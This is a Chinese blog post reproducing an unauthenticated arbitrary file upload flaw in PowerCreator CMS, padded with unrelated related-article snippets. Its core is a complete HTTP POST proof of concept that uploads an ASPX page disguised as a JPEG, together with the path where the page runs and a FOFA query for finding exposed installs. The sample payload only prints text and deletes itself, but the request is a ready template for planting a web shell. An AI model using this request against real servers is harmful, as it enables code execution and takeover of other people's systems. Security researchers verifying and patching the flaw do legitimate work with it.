PowerCreatorCMS UploadResourcePic 任意文件上传漏洞复现

最新推荐文章于 2024-07-21 10:19:57 发布
最新推荐文章于 2024-07-21 10:19:57 发布
阅读量963 收藏 1
点赞数 16
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77442655/article/details/140387017
版权

严正声明

1. 本文仅用于技术交流,目的是向相关安全人员展示漏洞的存在和利用方式,以便更好地提高网络安全意识和技术水平。

2. 任何人不得利用本文中的技术手段进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

3. 本文中提到的漏洞验证 poc 仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用此 poc。

0x01 产品简介

PowerCreator CMS是翰博尔信息技术有限公司(简称翰博尔PowerCreator)推出的一款教育资源管理平台,专注于教育领域的信息化解决方案。PowerCreator CMS是集成了软件平台和硬件设备、多系统高度融合的教育资源管理平台。它旨在通过技术手段提升教育资源的管理、共享和应用效率,助力教育机构实现教学管理的现代化和智能化。

0x02 漏洞概述

PowerCreatorCMS UploadResourcePic 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:app="PowerCreator-CMS"

0x04 漏洞复现

poc:

POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate
Connection: close
 
-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="qaz.aspx"
Content-Type: image/jpeg
 
<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
-----------------------------20873900192357278038549710136--

验证地址:/ResourcePic/ODM4Mg==.ASPX

响应代码特征

200

响应内容特征

promayser
关注
C#文件ashx(四)实现图片上传+支持多图上传
lan_学习分享
03-14 2654
掉了稍多坑,终于是能正常上传图片和保存了(gif的格式暂时存储成了jpg,现在只考虑静态图片部分),先上丑丑的效果图,点击图上的“+”号可以新增 后台存储图片路径pfb/UploadFiles: 一、前端页面+CSS文件+js文件:选择图片后,将图片转成流通Ajax去请求后台(这里传入图片类型,用来区分是png还是jpg或者其他文件) 1、html:和jq相关的库网上可以下...
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1897
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
漏洞复现PowerCreatorCMS UploadResourcePic 任意文件上传漏洞
最新发布
qq_39894062的博客
07-21 703
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
【selenium】Created By PowerCreator问题
胡侃有料的博客
06-02 264
every blog every motto: You will never know unless you try 0. 前言 用selenium进行自动化爬取信息时,遇到的问题 1. 正文 1.1 问题 在用selenium,访问链接时,会打开一个新的选项卡(标签页),但有的(视频页)有时会独立出来一个,标签页,无法对其获取定位元素,也无法进行关闭。如下图所示: 1.2 解决办法 重新切换回刚才的选项卡就行, browser.get(link) browser.switch_to.window(b
(20)文件上传漏洞:原理、原因、常见触发点分析,vulhub、upload、公开cms上传漏洞多种方法测试
03-08 1万+
在一步一步试错中进行上传漏洞的多种方法测试,让实践最真实
uploadfile图片上传和ashx
weixin_30834019的博客
10-09 301
uploadify.swf需要是支持中文 $(function () { //获取所有上传按钮id $("div[id^='fileInput_']").each(function () { var name = $(this).attr("id"); create(name); ...
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 948
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
cms奇怪的文件上传绕过漏洞
问题很多的小明
10-25 892
0x01 给老外写的时候用的英文(谷歌翻译的) I installed the latest version of ***(这个东西比较敏感) CMS and found upload bypass in the system In the latest version(3.0.4), the system forbids HTML suffix name upload, but now it c...
【Tomcat】Tomcat-Ajp漏洞测试与修复
密西西凌的博客
03-12 3096
Tomcat漏洞说明 Tomcat默认开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。 此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。 影响版本 Tomcat版本7 < 官网修复漏洞版本7.0.10...
CMS漏洞总结
include_voidmain的博客
08-01 4819
CMS漏洞总结
uploader.js使用说明
03-16
文档里有附件,封装的webuploader,对象形式传参,一句话调用,自定义上传流程回调函数,带进度条,本地删除,远程删除,MD5校验等
CMS 内容管理系统
weixin_30537391的博客
06-16 1892
http://www.codeplex.com/n2 N2是一个基于Asp.net的内容管理系统 此外,其他的CMS系统也很多 http://ssmax.net/archives/212.html 文章的介绍 先看看国内的: TurboCMS动易内容管理系统帝国网站管理系统 ECMSSupeSite 社区门户系统COMSHARP CMS - 锐商企业CMSphpcms 网站管理系统dedecms...
bboss平台子系统配置及系统登录以及其它常用配置介绍
weixin_34037515的博客
09-29 618
bboss平台子系统配置及系统登录以及其它常用配置介绍 bboss平台可以包含一个主系统和多个子系统,每个子系统可以配置独立的子系统登录界面以及登录成功的跳转界面。 主系统配置: 主系统配置文件为/resources/module.xml文件,可以在module.xml中配置子系统和主系统的模块、首页及菜单 主系统登录跳转页配置 修改module...
新闻资讯CMS内容管理系统的设计与实现(一)
热门推荐
Remoa的休闲茶馆
05-15 2万+
新闻资讯CMS内容管理系统的设计与实现(一)目录:1、项目背景:2、项目规划:3、系统结构图:4、系统架构图:5、系统用例图:6、业务流程图:7、E-R图:8、领域模型:9、数据字典:10、DDL建表语句:11、数据流图:1、项目背景:如标题,新闻资讯CMS内容管理系统的设计与实现,主要功能包括浏览新闻、编辑发布、用户管理、评论回复、文章收藏、广告管理、分栏管理等等。后台框架:Spring + S...
Web安全 -- 逻辑漏洞
Fly_鹏程万里
07-10 2192
逻辑漏洞逻辑漏洞应用在方方面面,主要是根据应用不通产生的逻辑方面漏洞不同。比如金融网站和互联网网站以及购物网站,挖掘逻辑漏洞方法完全不一样。所以本篇算是冰山一角,给大家一个科普!常规漏洞漏洞逻辑漏洞是指由于程序逻辑不严或逻辑太复杂,导致一些逻辑分支不能够正常处理或处理错误,一般出现在一下几个方面:任意密码修改(没有旧密码验证)越权访问密码找回交易支付金额......登陆时,是否可以绕过验证码形成撞...
文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞
m0_64378913的博客
07-12 2303
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
超级CMS2.39-文件上传漏洞
LYJ20010728的博客
06-21 717
超级CMS2.39-文件上传漏洞环境搭建漏洞复现上传点一上传点二上传点三漏洞分析 环境搭建 下载超级CMS V2.39,下载地址 使用phpstudy搭建web环境 把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 上传点一 上传点二 上传点三 漏洞分析 存在漏洞的位置file.class.php文件中的getFileExtName方法 public function getFileExtName($filename){ $filename
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值